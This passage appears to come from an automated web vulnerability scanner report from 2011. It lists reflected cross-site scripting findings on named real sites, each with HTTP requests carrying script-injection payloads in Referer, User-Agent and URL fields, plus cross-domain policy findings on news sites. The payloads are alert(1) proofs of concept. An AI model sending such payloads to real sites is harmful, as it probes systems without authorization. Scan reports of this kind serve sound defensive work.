Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsenvconst.ashx HTTP/1.1
Host: www.bmwusa.com
Proxy-Connection: keep-alive
Referer: http://www.bmwusa.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.106a9f9"-alert(1)-"b61067d8f0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CHECK=XP9y6GTRm#@U; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; NSC_CNX_21529_64.29.204.16=4f52b42b3660

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:27:16 GMT
Connection: close
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 19:47:16 GMT;path=/
Content-Length: 663

var WEBSITE_URL = "www.bmwusa.com";
var WEB_SERVICES_URL = "ws.bmwusa.com";
var WCF_SERVICES_URL = "ws.bmwusa.com";
var RESOURCE_SERVER_URL = "cache.bmwusa.com";
var MOBILE_URL = "m.bmwusa.com";

...[SNIP]...
R_HANDLING_URL_PART = "/BYO/ErrorReportingService.svc";
var CLIENT_USER_AGENT = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.106a9f9"-alert(1)-"b61067d8f0";
var CONNECTION_TYPE = "http://";

3.147. http://www.employmentauthority.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.employmentauthority.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b213"><script>alert(1)</script>04714215063 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.employmentauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5b213"><script>alert(1)</script>04714215063

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=1coc9qurhv2fasslu1mvim2s27; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=1coc9qurhv2fasslu1mvim2s27; path=/; domain=.employmentauthority.com
Set-Cookie: PHPSESSID=1coc9qurhv2fasslu1mvim2s27; path=/; domain=.employmentauthority.com
Set-Cookie: PHPSESSID=1coc9qurhv2fasslu1mvim2s27; path=/; domain=.employmentauthority.com
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 86164

                   
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Employment Services, Executive Employment, Executive Search Consultants, Executive Job Openings</title>
<met
...[SNIP]...
<input type="hidden" id="clscandidate_refferalurl" name="clscandidate_refferalurl" value="http://www.google.com/search?hl=en&q=5b213"><script>alert(1)</script>04714215063">
...[SNIP]...

3.148. https://www.lawschoolloans.com/lslprivateloan_application.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.lawschoolloans.com
Path:   /lslprivateloan_application.php

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79c53'-alert(1)-'09f566a429 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lslprivateloan_application.php HTTP/1.1
Host: www.lawschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=79c53'-alert(1)-'09f566a429

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:26:04 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: PHPSESSID=12661fb1a6201f640fe9b1adbc58f535; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 29971

<script type="text/javascript" src="https://www.lawschoolloans.com/script/overlibmws.js"></script>
<script type="text/javascript" src="https://www.lawschoolloans.com/script/overlibmws_scroll.js"></scr
...[SNIP]...
<script type="text/javascript">
   var submitflag = false;
       
   var page_referrer = 'http://www.google.com/search?hl=en&q=79c53'-alert(1)-'09f566a429';
   var landing_page = 'lslprivateloan_application.php';
   function validateregistration()
   {
       var frm = document.formmain;
       errmsg = "";        
       frm.clsregistration_hdnpage_referrer.value = page_referrer
...[SNIP]...

3.149. http://www.legalauthority.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.legalauthority.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9df7c"><script>alert(1)</script>a596e96ecab was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9df7c"><script>alert(1)</script>a596e96ecab

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=03bo7h1rnmb5ajcrf3d5hmjr85; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=03bo7h1rnmb5ajcrf3d5hmjr85; path=/; domain=.legalauthority.com
Set-Cookie: LA_RUSH_ORDER=deleted; expires=Thu, 21-Jan-2010 19:41:41 GMT; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 130329

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
   <title>Legal Resume Consultant, Legal Job Search, Sample Attorney Resume, Legal S
...[SNIP]...
<input type="hidden" name="clscandidateinfo_refferalurl" value="http://www.google.com/search?hl=en&q=9df7c"><script>alert(1)</script>a596e96ecab">
...[SNIP]...

3.150. http://www.legalauthority.com/signup.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.legalauthority.com
Path:   /signup.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70b9a"><script>alert(1)</script>58b9969c6e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /signup.php HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=70b9a"><script>alert(1)</script>58b9969c6e

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=gf3uf2l80p21qgdvt5tkeeshn4; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=gf3uf2l80p21qgdvt5tkeeshn4; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 56675

                   
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title
...[SNIP]...
<input type="hidden" name="clscandidateinfo_refferalurl" value="http://www.google.com/search?hl=en&q=70b9a"><script>alert(1)</script>58b9969c6e">
...[SNIP]...

3.151. http://www.legalauthority.com/tmlandingpage.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.legalauthority.com
Path:   /tmlandingpage.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5a1a"><script>alert(1)</script>3ecb044851e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /tmlandingpage.php HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a5a1a"><script>alert(1)</script>3ecb044851e

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:41:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=ldenka01g7h9afh3an526c4l36; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=ldenka01g7h9afh3an526c4l36; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 56234

                   
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title
...[SNIP]...
<input type="hidden" name="clscandidateinfo_refferalurl" value="http://www.google.com/search?hl=en&q=a5a1a"><script>alert(1)</script>3ecb044851e">
...[SNIP]...

3.152. http://www.toyota.com/mobility/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toyota.com
Path:   /mobility/index.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecf7d"style%3d"x%3aexpression(alert(1))"838c92d8b6a was submitted in the REST URL parameter 1. This input was echoed as ecf7d"style="x:expression(alert(1))"838c92d8b6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /mobilityecf7d"style%3d"x%3aexpression(alert(1))"838c92d8b6a/index.html HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C85011498-40000111E00049C8[CE]; s_sq=%5B%5BB%5D%5D; OHVJ=CT; mbox=check#true#1295637814|session#1295637753722-357961#1295639614|PC#1295637753722-357961.17#1296847355;

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www.toyotamobility.comecf7d"style="x:expression(alert(1))"838c92d8b6a/index.html
Content-Length: 295
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:54:10 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.toyotamobility.comecf7d"style="x:expression(alert(1))"838c92d8b6a/index.html">
...[SNIP]...

4. Flash cross-domain policy  previous  next
There are 5 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://www.huffingtonpost.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.huffingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Unix)
Last-Modified: Thu, 01 Jul 2010 13:55:20 GMT
ETag: "26e2850-fd-48a53d22e2200"
Content-Type: application/xml
Date: Fri, 21 Jan 2011 22:28:28 GMT
Content-Length: 253
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*" /><allow-http-request-headers
...[SNIP]...

4.2. http://www.msnbc.msn.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.msnbc.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.msnbc.msn.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 13 Dec 2010 23:28:06 GMT
ETag: "fa4f1f651d9bcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 23:39:25 GMT
Content-Length: 3654
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...

4.3. http://www.nytimes.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nytimes.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 22 Jan 2011 01:23:31 GMT
Content-length: 1169
Content-type: text/xml
Set-cookie: RMID=2d1ea85e6af94d3a31937c53; expires=Sunday, 22-Jan-2012 01:23:31 GMT; path=/; domain=.nytimes.com
Last-modified: Wed, 21 Jul 2010 15:01:34 GMT
Accept-ranges: bytes
Connection: keep-alive

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.createthe.com" />
   <allow-access-from domain="*.predictify.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.*.brightcove.com" />
   <allow-access-from domain="*.nytsyndicate.com"/>
   <allow-access-from domain="*.*.nytsyndicate.com"/>
   <allow-access-from domain="xdce.adobe.com" />
   <allow-access-from domain="www.rokkandev.com" />
   <allow-access-from domain="cdn.eyewonder.com" />
   <allow-access-from domain="apps.eyewonderlabs.com" />
   <allow-access-from domain="media.pointroll.com" />
   <allow-access-from domain="speed.pointroll.com" />
<allow-access-from domain="u-sta.unicast.com"/>
<allow-access-from domain="creativeby1.unicast.com"/>
<allow-access-from domain="creativeby2.unicast.com"/>
<allow-access-from domain="picklegroup.com"/>
...[SNIP]...

4.4. http://www.politico.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.politico.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.politico.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.6 (Fedora)
Last-Modified: Mon, 08 Mar 2010 23:08:26 GMT
ETag: "ffc7c-2cc-24782e80"
Content-Type: text/xml
Cache-Control: max-age=10
Expires: Fri, 21 Jan 2011 23:39:59 GMT
Date: Fri, 21 Jan 2011 23:39:49 GMT
Content-Length: 716
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.politico.com" />
   <allow-access-from domain="*brightcove" />
   <allow-access-from domain="*.brightcove" />
   <allow-access-from domain="*.brightcove.com" />
   <allow-access-from domain="*.politiconetwork.com" />
   <allow-access-from domain="brightcove.vo.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="cache.btrll.com" secure="true" />
...[SNIP]...
<allow-access-from domain="admin.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.google-analytics.com"/>
   <allow-access-from domain="*.omniture.com"/>
...[SNIP]...

4.5. http://www.usatoday.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Length: 1507
Content-Type: text/xml
Last-Modified: Mon, 02 Aug 2010 19:50:58 GMT
Accept-Ranges: bytes
ETag: "72574c77c32cb1:1f"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sat, 22 Jan 2011 01:23:58 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...

5. Silverlight cross-domain policy  previous  next
There are 2 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://www.usatoday.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Length: 730
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:58:44 GMT
Accept-Ranges: bytes
ETag: "3115b4c8f2baca1:1f"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sat, 22 Jan 2011 01:23:58 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
               <domain uri="*"/>

...[SNIP]...

5.2. http://www.msnbc.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.msnbc.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.msnbc.msn.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT
ETag: "55f13f705474ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Cnection: close
Date: Fri, 21 Jan 2011 23:39:25 GMT
Content-Length: 533
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.msn.com"/>
<domain uri="https://*.msnbc.msn.com"/>
...[SNIP]...

6. Cleartext submission of password  previous  next
There are 125 instances of this issue:

Issue background

